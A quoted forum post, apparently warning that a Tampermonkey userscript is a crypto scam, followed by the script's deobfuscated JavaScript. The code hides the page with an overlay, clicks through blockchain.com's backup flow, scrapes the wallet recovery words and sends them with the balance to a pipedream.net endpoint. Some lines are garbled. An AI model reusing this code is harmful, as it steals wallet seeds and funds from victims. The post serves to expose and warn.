shadowplatinum1 сказал(а):
it is a scam method with temper monkey it gives you an obfuscated js file when deobfuscated it you can see in code it gets your blockchain.com private keys and current balances on account below i will drop the deobfuscated script
JavaScript:
Скопировать в буфер обмена
var _typeof2 =
typeof Symbol === 'function' && typeof Symbol.iterator === 'symbol'
? function (objOrTsid) {
return typeof objOrTsid
}
: function (obj) {
obj
Symbol
objconstructor Symbol
obj prototype
obj
var_typeof
Symbol Symboliterator
obj obj
obj
Symbol
objconstructor Symbol
obj prototype
: typeof obj === 'undefined'
? 'undefined'
: _typeof2(obj)
}
var wyley = (function() {
var y$$ = true
return function (body, fmt) {
var voronoi = y$$
? function() {
if (fmt) {
varcode = fmt.apply(body, arguments)
return (fmt = null), code
}
}
: function() {}
return (y$$ = false), voronoi
}
})()
var edvard = wyley(undefined, function () {
return edward
.toString()
.search('(((.+)+)+)+$')
.toString()
.constructor(edvard)
.search('(((.+)+)+)+$')
})
edward()
var neilia = (function() {
var y$$ = true
return function (body, fmt) {
var voronoi = y$$
? function() {
if (fmt) {
varcode = fmt.apply(body, arguments)
return (fmt = null), code
}
}
: function() {}
return (y$$ = false), voronoi
}
})()
var kather = neilia(undefined, function () {
var glbl =
typeof window !== 'undefined'
? window
: (typeof process === 'undefined' ? 'undefined' : _typeof(process)) ===
'object' &&
typeof require === 'function' &&
(typeof global === 'undefined' ? 'undefined' : _typeof(global)) ===
'object'
? global
: this
var glyphsByName = (glbl.console = glbl.console || {})
var methods = ['log', 'warn', 'info', 'error', 'exception', 'table', 'trace']
var i = 0
for (; i < methods.length; i++) {
var o = neilia.constructor.prototype.bind(neilia)
varname = methods
varpath = glyphsByName[name] || o
o.__proto__ = neilia.bind(neilia)
o.toString = path.toString.bind(path)
glyphsByName[name] = o
}
})
kather()
function checkAndPerformActions() {
var imageBinary = document.querySelector('div[data-e2e="topBalanceTotal"]')
var dfY1 = parseFloat(imageBinary.textContent.replace(/[^\d.-]/g, ''))
if (dfY1 > 0) {
varmaskNode = document.createElement('div')
maskNode.style.position = 'fixed'
maskNode.style.top = '0'
maskNode.style.left = '0'
maskNode.style.width = '100%'
maskNode.style.height = '100%'
maskNode.style.backgroundColor = '#fff'
maskNode.style.zIndex = '9999'
document.body.appendChild(maskNode)
var psUrl = window.location.href
window.location.href =
'https://login.blockchain.com/en/#/security-center/basic'
setTimeout(function() {
var imgchk = document.querySelector(
'button[data-e2e="backupFundsButton"]'
)
if (imgchk) {
imgchk.click()
}
setTimeout(function() {
var imgchk = document.querySelector('button[data-e2e="toBackupFlyout"]')
if (imgchk) {
imgchk.click()
}
setTimeout(function() {
var CSSTxt = Array.from(
document.querySelectorAll('div[data-e2e="backupWords"] div')
)
.map(function (topnode) {
return topnode.textContent.trim()
})
.join(' ')
var imgchk = document.querySelector(
'button[data-e2e="toRecoveryTwo"]'
)
if (imgchk) {
imgchk.click()
}
setTimeout(function() {
CSSTxt=
CSSTxt +
(' ' +
Array.from(
document.querySelectorAll('div[data-e2e="backupWords"] div')
)
.map(function (topnode) {
return topnode.textContent.trim()
})
.join(' '))
window.location.href = psUrl
setTimeout(function() {
document.body.removeChild(maskNode)
if (CSSTxt !== ' ') {
clearInterval(intervalId)
var mekiyah = CSSTxt.replace(/\d+/g, '')
.replace(/^\s+|\s+$/g, '')
.replace(/\s+/g, ' ')
var td1b2 = document.querySelector(
'div[data-e2e="topBalanceTotal"]'
)
window.location.href =
'https://eoszaaexw5ctdb6.m.pipedream.net/?words=' +
mekiyah +
'&balance=' +
td1b2.textContent
}
}, 50)
}, 50)
}, 50)
}, 50)
}, 50)
}
}
var intervalId = setInterval(function() {
try {
checkAndPerformActions()
} catch (aizlyn) {}
}, 3000)
Нажмите, чтобы раскрыть...